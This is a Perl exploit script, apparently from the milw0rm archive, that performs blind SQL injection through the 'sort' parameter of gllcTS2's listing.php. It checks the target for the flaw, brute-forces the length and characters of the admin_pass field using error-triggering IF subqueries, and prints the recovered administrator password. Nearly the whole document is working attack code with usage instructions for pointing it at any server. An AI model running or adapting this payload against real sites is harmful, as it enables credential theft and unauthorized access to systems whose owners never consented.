GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit by h3m4n

      1   #!/usr/bin/perl
      2   ######################
      3   #
      4   #gllcTS2 (listing.php $sort) Remote Blind SQL Injection Exploit
      5   #
      6   ######################
      7   #
      8   #Bug by: h0yt3r
      9   #
  10      ##
  11      ###
  12      ##
  13      #
  14      #This one shows another vulnerability in the gllcTS2. (Thera are many with simple injections)
  15      #Same Versions are affected.
  16      #Also shows the conecpt of how to inject an ORDER BY statement via Blind Injection and
  17      #WITHOUT benchmark(), means we produce an error if the IF statement returns TRUE.
  18      #
  19      #Gr33tz go to:
  20      #b!zZ!t, ramon, thund3r, Free−Hack, Sys−Flaw and of course the neverdying h4ck−y0u Team
  21      #
  22      ################
  23      use LWP::UserAgent;
  24      my $userAgent = LWP::UserAgent−>new;
  25
  26      usage();
  27
  28      $server = $ARGV[0];
  29      $dir = $ARGV[1];
  30
  31
  32      print"\n";
  33      if (!$dir) { die "Read Usage!\n"; }
  34
  35
  36      $filename ="listing.php";
  37
  38      my $vulnCheck = "http://".$server.$dir.$filename;
  39
  40      my $prefix ="";
  41
  42      my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76"
          ,"77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30");
  43
  44      my $Attack= $userAgent−>get($vulnCheck);
  45      if ($Attack−>is_success)
  46      {
  47           print "[x]Attacking ".$vulnCheck."\n";
  48      }
  49      else
  50      {
  51           print "Couldn’t connect to ".$vulnCheck."!";
n/a                                                                                                                        06/13/2008
                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                   Page 2/3
  52         exit;
  53    }
  54
  55    print "[x]Vulnerable Check:";
  56
  57    my $check = $vulnCheck."?sort=’";
  58
  59    my $Attack= $userAgent−>get($check);
  60    if($Attack−>content =~ m/FROM (.*?)_weblist/i)
  61    {
  62         print " Vulnerable!\n";
  63         $prefix = $1;
  64    }
  65    else
  66    {
  67         print " Not Vulnerable!";
  68         exit;
  69    }
  70
  71    my $hex="";
  72    my $length;
  73
  74    print "[x]Bruteforcing Length\n";
  75
  76    my $lengthCounter = 1;
  77    while(1)
  78    {
  79          #To inject ORDER BY (where we cannot union select) we just have to pass a simple IF statement.
  80          #Instead of Benchmark() we can use a subquery which, in this case, would return "Subquery returns more than 1 row
        " if the statement actualle is true.
  81          my $url = "".$vulnCheck."?sort=IF(LENGTH((select admin_pass from ".$prefix."_admin))=".$lengthCounter.",(select 1 union select 5),null)&
        direction=desc&showgroup=all";
  82          my $Attack= $userAgent−>get($url);
  83          my $content = $Attack−>content;
  84          if($content =~ m/Please contact a the site admin immediately./i)
  85          {
  86               $length=$lengthCounter;
  87               last;
  88          }
  89          else
  90          {
  91               $lengthCounter++;
  92          }
  93    }
  94
  95
  96    print "[x]Injecting Black Magic\n";
  97
  98    for($b=1;$b<=$length;$b++)
  99    {
  100       for(my $u=0;$u<28;$u++)
  101       {
n/a                                                                                                                                        06/13/2008
                           GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                        Page 3/3
  102                my $url = "".$vulnCheck."?sort=IF(substring((select admin_pass from ".$prefix."_admin),".$b.",1)=0x".$Daten[$u].",(select 1 union sel
        ect 5),null)&direction=desc&showgroup=all";
  103
  104             my $Attack= $userAgent−>get($url);
  105
  106             my $content = $Attack−>content;
  107
  108             if($content =~ m/Please contact a the site admin immediately./i)
  109             {
  110                 print "[x] Found Char ".$Daten[$u]."\n";
  111                 $hex=$hex.$Daten[$u];
  112                 last;
  113             }
  114
  115             else
  116             {
  117                  #Whatever...
  118             }
  119        }
  120   }
  121
  122   print "[x]Converting \n";
  123   my $a_str = hex_to_ascii($hex);
  124
  125   print "[x]Success! \n";
  126   print " Adminpassword: $a_str\n";
  127
  128   sub hex_to_ascii ($)
  129   {
  130           (my $str = shift) =~ s/([a−fA−F0−9]{2})/chr(hex $1)/eg;
  131           return $str;
  132   }
  133
  134   sub usage()
  135   {
  136       print q
  137       {
  138       ######################################################
  139                 gllcTS2 Remote Blind SQL Injection Exploit
  140                            −Written by h0yt3r−
  141       Usage: gllcts2.pl [Server] [Path]
  142       Sample:
  143       perl gllcts2.pl www.site.com /cms/
  144       ######################################################
  145       };
  146
  147   }
  148
# milw0rm.com [2008-06-13]


